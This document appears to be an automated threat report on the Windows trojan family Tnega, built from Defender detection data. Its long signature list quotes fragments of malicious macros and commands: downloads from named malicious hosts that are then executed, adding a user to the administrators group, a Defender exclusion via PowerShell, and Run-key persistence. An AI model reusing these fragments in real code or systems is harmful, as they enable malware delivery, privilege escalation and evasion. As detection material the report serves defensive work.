Trojan:Win64/Tnega!MSR - Windows Defender threat signature analysis
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:Win64/Tnega!MSR
Classification:
 - Type: Trojan
 - Platform: Win64
 - Family: Tnega
 - Detection Type: Concrete (known malware family with identified signatures)
 - Suffix: !MSR (high-priority threat flagged by Microsoft Security Response)
 - Confidence: Very High
 - False-Positive Risk: Low

Concrete signature match: a Trojan (software that appears legitimate but performs malicious actions) targeting the 64-bit Windows platform, family Tnega.

Summary:

This threat is a trojan downloader, likely initiated by a malicious document macro. The macro connects to remote servers (e.g., craghoppers.icu) to download and execute a secondary payload. The malware then attempts to save files, such as 'onenote.db' or 'wsdts.db', into user AppData directories to establish persistence and evade detection.

Severity: Critical

VDM Static Detection:
Relevant strings associated with this threat:
 - https://cdn.jsd (PEHSTR_EXT)
 - gh/i87924hgHd (PEHSTR_EXT)
 - y/bboxfu<', 'that3.e (PEHSTR_EXT)
 - CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - //smartscreentestratings2.net/ (MACROHSTR_EXT)
 - .exe (MACROHSTR_EXT)
 - https: (MACROHSTR_EXT)
 - .Run CreateObject("Scripting.FileSystemObject"). (MACROHSTR_EXT)
 - .exe" (MACROHSTR_EXT)
 - CreateObject("Scripting.FileSystemObject").FileExists(szFile) (MACROHSTR_EXT)
 - Set oNode = oXML.CreateElement("base64") (MACROHSTR_EXT)
 - = Environ("UserProfile") & "\AppData\Local\Microsoft\Notice (MACROHSTR_EXT)
 - dllPath = workDir & "\" & binName (MACROHSTR_EXT)
 - binName = "wsdts.db (MACROHSTR_EXT)
 - = ActiveDocument.Path & "\" & ActiveDocument.Name (MACROHSTR_EXT)
 - = curDocName & " .docx" (MACROHSTR_EXT)
 - workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\OneNote" (MACROHSTR_EXT)
 - dllPath = workDir & "\onenote.db" (MACROHSTR_EXT)
 - Dm = "http://craghoppers.icu/Order.jpg|||msxml2.xmlhttp (MACROHSTR_EXT)
 - Dm = "http://moveis-schuster-com.ga/Order.jpg|||msxml2.xmlhttp (MACROHSTR_EXT)
 - Set xmlHttp = CreateObject(VB) (MACROHSTR_EXT)
 - .Open "get", strURL (MACROHSTR_EXT)
 - + "objShell.Run Base64Decode(" (MACROHSTR_EXT)
 - = "C:\Windows\System32\w" + "script" + ".exe " (MACROHSTR_EXT)
 - "WScript." + "She" + "ll" (MACROHSTR_EXT)
 - + "." + "v" (MACROHSTR_EXT)
 - GetDllName = "C:\ProgramData\desktop.dat" (MACROHSTR_EXT)
 - .CreateElement("base64") (MACROHSTR_EXT)
 - ActiveDocument.Path & "\" & ActiveDocument.Name (MACROHSTR_EXT)
 - , ".") - 1) (MACROHSTR_EXT)
 - CreateObject("Word.Application") (MACROHSTR_EXT)
 - viebobpspa_autologon_admin.bat (PEHSTR_EXT)
 - autologon.exe !viebobpspa EU odeA5SvxTzsDa7kwqDq6K6Xr8Bukha -accepteula (PEHSTR_EXT)
 - net localgroup administrators eu\!viebobpspa /add (PEHSTR_EXT)
 - C:\TEMP\2890.tmp\viebobpspa_autologon_admin.bat (PEHSTR_EXT)
 - System.Runtime.InteropServices (PEHSTR_EXT)
 - System.Runtime.CompilerServices (PEHSTR_EXT)
 - System.Resources (PEHSTR_EXT)
 - CowsAndBulls.GameForm.resources (PEHSTR_EXT)
 - CowsAndBulls.HighScoresForm.resources (PEHSTR_EXT)
 - CowsAndBulls.MainMenuForm.resources (PEHSTR_EXT)
 - CowsAndBulls.Properties.Resources.resources (PEHSTR_EXT)
 - cmd.exe /c powershell.exe -windowstyle hidden Sleep 5 (PEHSTR_EXT)
 - GetCommandLineW (PEHSTR_EXT)
 - TOKEN_STEALER_CREATOR.Properties (PEHSTR_EXT)
 - ItroublveTSC\bin_copy\obj\Debug (PEHSTR_EXT)
 - 4S;/M (SNID)
 - ApplyRequest.dll (PEHSTR)
 - ScriptDDL (PEHSTR)
 - _lstStatusExec (PEHSTR)
 - _reqScript (PEHSTR)
 - ExecuteAllSteps (PEHSTR)
 - SendProgressExec (PEHSTR)
 - GerarScriptsDrop (PEHSTR)
 - GetListReplaceDll (PEHSTR)
 - lblcomputadorresponsavel (PEHSTR)
 - DgFqNyZD2NcjS7p60JGMch18mc8g (PEHSTR_EXT)
 - RESUTILS.dll (PEHSTR)
 - RPCRT4.dll (PEHSTR)
 - wsnmp32.dll (PEHSTR)
 - SOFTWARE\Borland\Delphi\RTL (PEHSTR)
 - sqlite3.dll (PEHSTR)
 - /C:\ProgramData\Avast Software\Avast\aswResp.dat (PEHSTR)
 - _acmdln (PEHSTR)
 - __p__commode (PEHSTR)
 - /uke3 (SNID)
 - 99`\, (SNID)
 - TankGame.My.Resources (PEHSTR_EXT)
 - TankGame.Game.resources (PEHSTR_EXT)
 - TankGame.MainForm.resources (PEHSTR_EXT)
 - TankGame.StartUp.resources (PEHSTR_EXT)
 - TankGame.Resources.resources (PEHSTR_EXT)
 - TankGame.MultipleBlocks.resources (PEHSTR_EXT)
 - TankGame.InGameOptions.resources (PEHSTR_EXT)
 - TankGame.QuickStart.resources (PEHSTR_EXT)
 - C:\ProgramData\Avast Software\Avast\aswResp.dat (PEHSTR_EXT)
 - SOFTWARE\Borland\Delphi\CPM (PEHSTR_EXT)
 - _acmdln (PEHSTR_EXT)
 - __p__commode (PEHSTR_EXT)
 - sqlite3.dll (PEHSTR_EXT)
 - \VersionIndependentProgID (PEHSTR_EXT)
 - DefenderCSP.dll (PEHSTR_EXT)
 - 3yD`. (SNID)
 - bcrypt.dll (PEHSTR_EXT)
 - zeeLog.txt (PEHSTR_EXT)
 - Interfaces.ShellExtension.JumpList (PEHSTR_EXT)
 - file.dat (PEHSTR_EXT)
 - ShellExecuteW (PEHSTR_EXT)
 - Task24Main.pdb (PEHSTR_EXT)
 - HttpWebResponse (PEHSTR_EXT)
 - CellManager.g.resources (PEHSTR_EXT)
 - CellManager.exe (PEHSTR_EXT)
 - aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources (PEHSTR_EXT)
 - XRails.Controls (PEHSTR_EXT)
 - TwiceSlicePanel.UI (PEHSTR_EXT)
 - Client.Connection (PEHSTR_EXT)
 - \7AAAAAAAAAAAAAA (PEHSTR_EXT)
 - ppphhyf.exe (PEHSTR_EXT)
 - dKO:. (SNID)
 - Oc\p! (SNID)
 - powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath (PEHSTR_EXT)
 - report_error.php?key=125478824515ADNxu2ccbwe&msg=No-Exes-Found-To-Run (PEHSTR_EXT)
 - http://sornx.xyz (PEHSTR_EXT)
 - myip.php (PEHSTR_EXT)
 - addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=12 (PEHSTR_EXT)
 - addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=12 (PEHSTR_EXT)
 - Cadave.pdb (PEHSTR_EXT)
 - Top1Mu.Net (PEHSTR_EXT)
 - Data/Logo/System.pro (PEHSTR_EXT)
 - Release\Main.pdb (PEHSTR_EXT)
 - OhTTij5lmnomlkjst\Xuh (PEHSTR_EXT)
 - $I3\$ (PEHSTR_EXT)
 - \payloaddll\Release\cmd.pdb (PEHSTR_EXT)
 - ME_ADAudit.exe (PEHSTR_EXT)
 - https://cdn.discordapp.com/attachments/895494963515772931/895591057251762186/test_2.dll (PEHSTR_EXT)
 - D:\OneDrive\Projects\OneDriveTimer\OneDriveTimerUI\obj\Release\OneDriveTimerUI.pdb (PEHSTR_EXT)
 - OneDriveTimerUI.Properties.Resources (PEHSTR_EXT)
 - CenterToScreen (PEHSTR_EXT)
 - SetThreadExecutionState (PEHSTR_EXT)
 - @Uj/<[]t (SNID)
 - MtgKERNEL32.dll (PEHSTR_EXT)
 - DonWS2_32.dll (PEHSTR_EXT)
 - Zu8K{. (SNID)
 - www.Yanjie.com (PEHSTR_EXT)
 - http://101.35.18.254/444.exe (PEHSTR_EXT)
 - \111.exe (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - C:\ProgramData\444.exe (PEHSTR_EXT)
 - ShellExecute (PEHSTR_EXT)
 - D$,lExe (PEHSTR_EXT)
 - q</2nK*>De!'7p/V (PEHSTR_EXT)
 - JoinDomain.exe (PEHSTR_EXT)
 - Software\ASProtect\Key (PEHSTR_EXT)
 - aspr_keys.ini (PEHSTR_EXT)
 - WkBycm9qZ2VxbGloSWZlbVQlKlFdbn5/ZGJgUyMvHRpKIzwnJTN2YXx5cjYnJDYpLkQ2OkBaeHF0c3dta21BVE5Tfww= (PEHSTR_EXT)
 - powershell wget https://bit.ly/3uNrtcg -O pin.txt (PEHSTR_EXT)
 - DownloadString('https://bit.ly/3uLJ706') (PEHSTR_EXT)
 - /home/keith/builds/mingw/gcc-9.2.0-mingw32-cross-native/mingw32/libgcc (PEHSTR_EXT)
 - 3<$1<$3<$\ (PEHSTR_EXT)
 - Dr4Zaap3qgP4pRB4NWbs9NQuRWalMrMG1AUda1mSG6I5n7u1nNriGo3RF0+Z/lfgeMNzjv46nK1VAIz9QXZ+VfgNxpd (PEHSTR_EXT)
 - tOH82ARnxdnufgODepMgEFCePdFSF4aj26l6HYbXlsnhvCh/NaRIPs+LM/BZtNDSNWyzOq2I4Xdho6ao= (PEHSTR_EXT)
 - +n51hDmYO9yaWP1yiFGAdu/cEvP8ojbpxBqFHzn7xvH (PEHSTR_EXT)
 - InitializeComponent (PEHSTR_EXT)
 - quanlykho.Properties (PEHSTR_EXT)
 - <Y\k` (SNID)
 - ogd368hc.dll (PEHSTR_EXT)
 - My.MyProject.Forms (PEHSTR)
 - C:\workspace\mudfix\attach\screen_block\general\obj\Release\general.pdb (PEHSTR_EXT)
 - wmiccomputersystemgetmodelFailed (PEHSTR_EXT)
 - http://xianggrhen.com/composure/ (PEHSTR_EXT)
 - FileManager.Form01.resources (PEHSTR_EXT)
 - CSVProject.Properties (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware associated with this threat:
 - Filename: 6020ea571ee6e09a0500421823fd5292858bd763acc4089a56af414cfb0c82ae(2)
 - Hash: 6020ea571ee6e09a0500421823fd5292858bd763acc4089a56af414cfb0c82ae
 - Date: 05/12/2025
Remediation Steps:
 - Isolate the affected system from the network.
 - Run a full antivirus scan to remove all components of the threat.
 - Block the identified malicious URLs and domains at the firewall.
 - Identify and delete the initial delivery vector (e.g., the malicious email or document).
 - Reset user credentials that were used on the compromised machine.
=== END REPORT ===